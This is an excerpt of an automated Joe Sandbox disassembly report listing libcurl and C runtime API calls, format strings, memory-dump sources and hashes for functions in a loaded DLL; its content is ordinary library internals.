                                                                                                                                  • String ID: %255[^:]:%d$*$:%u$Added %s:%d:%s to DNS cache$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!$RESOLVE %s:%d is - old addresses discarded!$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal!
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8DDEE5
                                                                                                                                  • curl_maprintf.LIBCURL(%u.%u.%u.%u,00000000,00000000,00000000,00000000), ref: 6B8DE134
                                                                                                                                    • Part of subcall function 6B8F48E0: curl_mvaprintf.LIBCURL(?,?,?,6B8D66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B8F48EA
                                                                                                                                    • Part of subcall function 6B8E84A0: inet_pton.WS2_32(00000002,00000000,?), ref: 6B8E8590
                                                                                                                                    • Part of subcall function 6B8E84A0: inet_pton.WS2_32(00000017,00000000,?), ref: 6B8E85C0
                                                                                                                                    • Part of subcall function 6B8D2A60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8D2BA0
                                                                                                                                  Strings
                                                                                                                                  • %u,%u,%u,%u,%u,%u, xrefs: 6B8DE06A
                                                                                                                                  • Connecting to %s (%s) port %d, xrefs: 6B8DE304
                                                                                                                                  • Can't resolve proxy host %s:%hu, xrefs: 6B8DE1DD
                                                                                                                                  • %u.%u.%u.%u, xrefs: 6B8DE12F
                                                                                                                                  • %c%c%c%u%c, xrefs: 6B8DDF1B
                                                                                                                                  • Illegal port number in EPSV reply, xrefs: 6B8DDF60
                                                                                                                                  • Weirdly formatted EPSV reply, xrefs: 6B8DDFCA
                                                                                                                                  • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 6B8DE10E
                                                                                                                                  • Can't resolve new host %s:%hu, xrefs: 6B8DE257
                                                                                                                                  • Bad PASV/EPSV response: %03d, xrefs: 6B8DE3A3
                                                                                                                                  • Couldn't interpret the 227-response, xrefs: 6B8DE083
                                                                                                                                  Similarity
                                                                                                                                  • API ID: inet_pton$Unothrow_t@std@@@___from_strstr_to_strchr__ehfuncinfo$??2@curl_maprintfcurl_mvaprintf
                                                                                                                                  • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Negotiate,?,00000009,00000000,?,?,?,00000000), ref: 6B8EB61C
                                                                                                                                  • curl_strnequal.LIBCURL(NTLM,?,00000004,00000000,?,?,?,00000000), ref: 6B8EB6A0
                                                                                                                                  • curl_strnequal.LIBCURL(Digest,?,00000006,?,?,?,00000000,?,?,?,00000000), ref: 6B8EB704
                                                                                                                                  • curl_strnequal.LIBCURL(Basic,?,00000005,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 6B8EB75D
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal$curl_msnprintfcurl_mvsnprintf
                                                                                                                                  • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate$t!
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  • curl_slist_free_all.LIBCURL(00000000,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B90E994
                                                                                                                                    • Part of subcall function 6B8EB530: ___from_strstr_to_strchr.LIBCMT ref: 6B8EB55B
                                                                                                                                  • curl_slist_free_all.LIBCURL(00000000,?,Successfully compiled trailers.,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B90E8CD
                                                                                                                                  • curl_msnprintf.LIBCURL(?,0000000B,%zx%s,?,6B93BF70), ref: 6B90EAC6
                                                                                                                                    • Part of subcall function 6B9005D0: curl_mvsnprintf.LIBCURL(?,00000100,6B8FC830,?), ref: 6B900610
                                                                                                                                  Strings
                                                                                                                                  • operation aborted by callback, xrefs: 6B90E945
                                                                                                                                  • operation aborted by trailing headers callback, xrefs: 6B90E96F
                                                                                                                                  • Successfully compiled trailers., xrefs: 6B90E8BF
                                                                                                                                  • Signaling end of chunked upload via terminating chunk., xrefs: 6B90EB1B
                                                                                                                                  • Moving trailers state machine from initialized to sending., xrefs: 6B90E842
                                                                                                                                  • %zx%s, xrefs: 6B90EAA9
                                                                                                                                  • Read callback asked for PAUSE when not supported!, xrefs: 6B90E9DC
                                                                                                                                  • Signaling end of chunked upload after trailers., xrefs: 6B90EBBE
                                                                                                                                  • read function returned funny value, xrefs: 6B90EA35
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintfcurl_mvsnprintfcurl_slist_free_all$___from_strstr_to_strchr
                                                                                                                                  • String ID: %zx%s$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B8F27F0: curl_slist_free_all.LIBCURL(?,?), ref: 6B8F2801
                                                                                                                                    • Part of subcall function 6B8F27F0: curl_slist_free_all.LIBCURL(?), ref: 6B8F2812
                                                                                                                                  • curl_mime_init.LIBCURL(?,?,?), ref: 6B8DB187
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_slist_free_all$curl_mime_init
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2112604817-0
                                                                                                                                  • Opcode ID: bc949395acadc5847afb11d0a10bff012655bda8de7bdce5ef64b7c672930832
                                                                                                                                  • Instruction ID: 81918a5c071dc200b7d59a5d44b36cc4b5ac5e7f8a7f42c97a32d3a14c77c185
                                                                                                                                  • Opcode Fuzzy Hash: bc949395acadc5847afb11d0a10bff012655bda8de7bdce5ef64b7c672930832
                                                                                                                                  • Instruction Fuzzy Hash: 39814576E04616ABCB158E68DC42B5B77E8EF04364F040EA6EC18A7341E73DED2593D1
                                                                                                                                  APIs
                                                                                                                                  • curl_easy_strerror.LIBCURL(00000000), ref: 6B8DC103
                                                                                                                                  Strings
                                                                                                                                  • Remembering we are in dir "%s", xrefs: 6B8DC082
                                                                                                                                  • Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 6B8DC382
                                                                                                                                  • No data was received!, xrefs: 6B8DC3FD
                                                                                                                                  • ABOR, xrefs: 6B8DC0E6
                                                                                                                                  • Exceeded storage allocation, xrefs: 6B8DC2B3
                                                                                                                                  • control connection looks dead, xrefs: 6B8DC20D
                                                                                                                                  • Failure sending ABOR command: %s, xrefs: 6B8DC109
                                                                                                                                  • partial download completed, closing connection, xrefs: 6B8DC25B
                                                                                                                                  • Received only partial file: %I64d bytes, xrefs: 6B8DC417
                                                                                                                                  • server did not report OK, got %d, xrefs: 6B8DC29E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_easy_strerror
                                                                                                                                  • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received!$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                                                                                                                  • API String ID: 1399792982-944385548
                                                                                                                                  • Opcode ID: e125c6dbb8e098f13c184d6a0dfc3ef0c1f70d7cb54297e8c93d8daf4f73ac5c
                                                                                                                                  • Instruction ID: 4c2205e48c1e1535ddb1eae6488c1c7a47e7dea576a7cc2202f5b2e223f4ae10
                                                                                                                                  • Opcode Fuzzy Hash: e125c6dbb8e098f13c184d6a0dfc3ef0c1f70d7cb54297e8c93d8daf4f73ac5c
                                                                                                                                  • Instruction Fuzzy Hash: E7E1F3759047449BEB11CF68C881B9A7BF5AF46324F184DEAE8589B283D73CD580CFA1
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B935D6C
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B935D7E
                                                                                                                                  • _free.LIBCMT ref: 6B935D90
                                                                                                                                  • _free.LIBCMT ref: 6B935DA2
                                                                                                                                  • _free.LIBCMT ref: 6B935DB4
                                                                                                                                  • _free.LIBCMT ref: 6B935DC6
                                                                                                                                  • _free.LIBCMT ref: 6B935DD8
                                                                                                                                  • _free.LIBCMT ref: 6B935DEA
                                                                                                                                  • _free.LIBCMT ref: 6B935DFC
                                                                                                                                  • _free.LIBCMT ref: 6B935E0E
                                                                                                                                  • _free.LIBCMT ref: 6B935E20
                                                                                                                                  • _free.LIBCMT ref: 6B935E32
                                                                                                                                  • _free.LIBCMT ref: 6B935E44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 66a612039dbb34e06c3ac64e850d15d0d62f13e8b46396455eaae6526b2a2276
                                                                                                                                  • Instruction ID: fe844fdea9839ba9a4a9586ff23f7bfccb9eab0b957ca36abde289fa89082d6f
                                                                                                                                  • Opcode Fuzzy Hash: 66a612039dbb34e06c3ac64e850d15d0d62f13e8b46396455eaae6526b2a2276
                                                                                                                                  • Instruction Fuzzy Hash: F6215E32D48214EBCA14DE78F0D6D1F73EDBB1A31C360081AF1A9C7550CB38F88086A4
                                                                                                                                  APIs
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1B58
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1B81
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1B95
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1C9F
                                                                                                                                  • ___from_strstr_to_strchr.LIBCMT ref: 6B8F1D50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ___from_strstr_to_strchr
                                                                                                                                  • String ID: LDAP$base$one$onetree$sub$subtree
                                                                                                                                  • API String ID: 601868998-884163498
                                                                                                                                  • Opcode ID: 5cc479e1f309c52ce2f079040b88e96ef7027e0cba527fcbe4c9ff8c72793cf0
                                                                                                                                  • Instruction ID: dda7382407e2d7185f7b7eeafd95fca6e893d626fc41d8badbcf8d9403e7e137
                                                                                                                                  • Opcode Fuzzy Hash: 5cc479e1f309c52ce2f079040b88e96ef7027e0cba527fcbe4c9ff8c72793cf0
                                                                                                                                  • Instruction Fuzzy Hash: 2BA1F9B5D00225AFEF01AF78DC41BAA7BB8EF06789F1004A5E914E7252E739D911C7A1
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B90AEAE), ref: 6B90ACCE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B90ACE8
                                                                                                                                  • _strpbrk.LIBCMT ref: 6B90ACFC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc_strpbrk
                                                                                                                                  • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                                  • API String ID: 1657965159-3327535076
                                                                                                                                  • Opcode ID: e326ced33f09920138e912be764a09264a0783ed1b1256719346df1a4c8c0ac8
                                                                                                                                  • Instruction ID: d4ab1896d75f916ed7d2e94ae1f495ce004b9c33f55209c7fa1b99d629898fa7
                                                                                                                                  • Opcode Fuzzy Hash: e326ced33f09920138e912be764a09264a0783ed1b1256719346df1a4c8c0ac8
                                                                                                                                  • Instruction Fuzzy Hash: 03411D35708301ABEF105E789C457A9B76DDF47216F1081FEEC49D7201EE76C50546A0
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B9351CC
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935D6C
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935D7E
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935D90
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DA2
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DB4
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DC6
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DD8
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DEA
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935DFC
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E0E
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E20
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E32
                                                                                                                                    • Part of subcall function 6B935D4F: _free.LIBCMT ref: 6B935E44
                                                                                                                                  • _free.LIBCMT ref: 6B9351EE
                                                                                                                                  • _free.LIBCMT ref: 6B935203
                                                                                                                                  • _free.LIBCMT ref: 6B93520E
                                                                                                                                  • _free.LIBCMT ref: 6B935230
                                                                                                                                  • _free.LIBCMT ref: 6B935243
                                                                                                                                  • _free.LIBCMT ref: 6B935251
                                                                                                                                  • _free.LIBCMT ref: 6B93525C
                                                                                                                                  • _free.LIBCMT ref: 6B935294
                                                                                                                                  • _free.LIBCMT ref: 6B93529B
                                                                                                                                  • _free.LIBCMT ref: 6B9352B8
                                                                                                                                  • _free.LIBCMT ref: 6B9352D0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 97b3ee0179c277598029a80490da34b7d1e891520507ab327ae5041052e49f57
                                                                                                                                  • Instruction ID: 1f5a9a4aa6890e2650b3f63fd2995391c1b72aac72577e297096abfcc0a82966
                                                                                                                                  • Opcode Fuzzy Hash: 97b3ee0179c277598029a80490da34b7d1e891520507ab327ae5041052e49f57
                                                                                                                                  • Instruction Fuzzy Hash: FE315E31E143119FFB219A79E885B5A73EDFF14318F10449AE569D7164DF78E940CB20
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6B92D46B: CreateFileW.KERNEL32(00000000,00000000,?,6B92D873,?,?,00000000,?,6B92D873,00000000,0000000C), ref: 6B92D488
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B92D8DE
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B92D8E5
                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 6B92D8F1
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B92D8FB
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B92D904
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6B92D924
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6B92DA71
                                                                                                                                  • GetLastError.KERNEL32 ref: 6B92DAA3
                                                                                                                                  • __dosmaperr.LIBCMT ref: 6B92DAAA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                  • String ID: H
                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                  • Opcode ID: acb4c4ef0b22552c8bd1a25cac0f84b8bbdbf9b939da1117353422959b22b235
                                                                                                                                  • Instruction ID: 64078dfe601e2ffd79c8f784ea4ab44064e7bd9ed16eeb7ebfc0d31009eddaa2
                                                                                                                                  • Opcode Fuzzy Hash: acb4c4ef0b22552c8bd1a25cac0f84b8bbdbf9b939da1117353422959b22b235
                                                                                                                                  • Instruction Fuzzy Hash: ABA12232E681549FCF199F78C852BAE3BB4AF0B328F14019DE811AB395C739D816CB51
                                                                                                                                  APIs
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000018,%04d%02d%02d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B8DDC9D
                                                                                                                                  • curl_msnprintf.LIBCURL(?,00000080,Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT,?,?,?,?,?,?), ref: 6B8DDD74
                                                                                                                                    • Part of subcall function 6B9006B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,6B8F6C24), ref: 6B9006EF
                                                                                                                                    • Part of subcall function 6B9006B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B90072F
                                                                                                                                  Strings
                                                                                                                                  • %04d%02d%02d %02d:%02d:%02d GMT, xrefs: 6B8DDC95
                                                                                                                                  • %04d%02d%02d%02d%02d%02d, xrefs: 6B8DDC58
                                                                                                                                  • Given file does not exist, xrefs: 6B8DDC0D
                                                                                                                                  • unsupported MDTM reply format, xrefs: 6B8DDBFA
                                                                                                                                  • Skipping time comparison, xrefs: 6B8DDE44
                                                                                                                                  • The requested document is not new enough, xrefs: 6B8DDDF0
                                                                                                                                  • Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT, xrefs: 6B8DDD69
                                                                                                                                  • The requested document is not old enough, xrefs: 6B8DDE3D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_msnprintf$curl_mvsnprintf
                                                                                                                                  • String ID: %04d%02d%02d %02d:%02d:%02d GMT$%04d%02d%02d%02d%02d%02d$Given file does not exist$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$Skipping time comparison$The requested document is not new enough$The requested document is not old enough$unsupported MDTM reply format
                                                                                                                                  • API String ID: 405648482-226030088
                                                                                                                                  • Opcode ID: b67529524d931037d1ed1d1bfa3dc473165b4f2777e9aab35466e8112b5def07
                                                                                                                                  • Instruction ID: b0fb8c968099cde47b1a3e92bddddcd1e84ec246b9f1b4c50aa5333dbcfc8a72
                                                                                                                                  • Opcode Fuzzy Hash: b67529524d931037d1ed1d1bfa3dc473165b4f2777e9aab35466e8112b5def07
                                                                                                                                  • Instruction Fuzzy Hash: C861A176940718ABDF20CA74CC81FDAB7B9AF55304F0048DAE95DE7201EB39AA44CF61
                                                                                                                                  APIs
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDA0F
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDA4D
                                                                                                                                  • curl_msnprintf.LIBCURL(6B8E1696,00000009,%2I64d:%02I64d:%02I64d,6B8E1696,?,00000000,?,?,6B8E1696,?,6B8E1696,0000003C,00000000,00000000,?,00000E10), ref: 6B8FDAA5
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDABD
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B8FDAF2
                                                                                                                                  • curl_msnprintf.LIBCURL(6B8E1696,00000009,%3I64dd %02I64dh,00000000,6B8E1696,00000000,?,?,6B8E1696,00000E10,00000000,00000000,?,00015180,00000000,?), ref: 6B8FDB07
                                                                                                                                  • curl_msnprintf.LIBCURL(6B8E1696,00000009,%7I64dd,00000000,?,?,6B8E1696,00015180,00000000,?,6B8E1696,00000E10,00000000,?,6B8E1696,?), ref: 6B8FDB22
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_msnprintf
                                                                                                                                  • String ID: %2I64d:%02I64d:%02I64d$%3I64dd %02I64dh$%7I64dd
                                                                                                                                  • API String ID: 2752550610-564197712
                                                                                                                                  • Opcode ID: 0de82e7e7c3722a30bbf37d4b43ed963a05112e361f7b5b5f757d19201d054a8
                                                                                                                                  • Instruction ID: 179454ddccb9cf6a1e263ab63e206e8ac4a1cae12f101591db9fed5aa2c86974
                                                                                                                                  • Opcode Fuzzy Hash: 0de82e7e7c3722a30bbf37d4b43ed963a05112e361f7b5b5f757d19201d054a8
                                                                                                                                  • Instruction Fuzzy Hash: 8F414473B802187AEB204D7C8C51FAEBBADDBD4694F050575FE08EB290E675DD1283A0
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6B92F40D
                                                                                                                                    • Part of subcall function 6B92F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0), ref: 6B92F800
                                                                                                                                    • Part of subcall function 6B92F7EA: GetLastError.KERNEL32(6B9538A0,?,6B935EE0,6B9538A0,00000000,6B9538A0,00000000,?,6B935F07,6B9538A0,00000007,6B9538A0,?,6B93532A,6B9538A0,6B9538A0), ref: 6B92F812
                                                                                                                                  • _free.LIBCMT ref: 6B92F419
                                                                                                                                  • _free.LIBCMT ref: 6B92F424
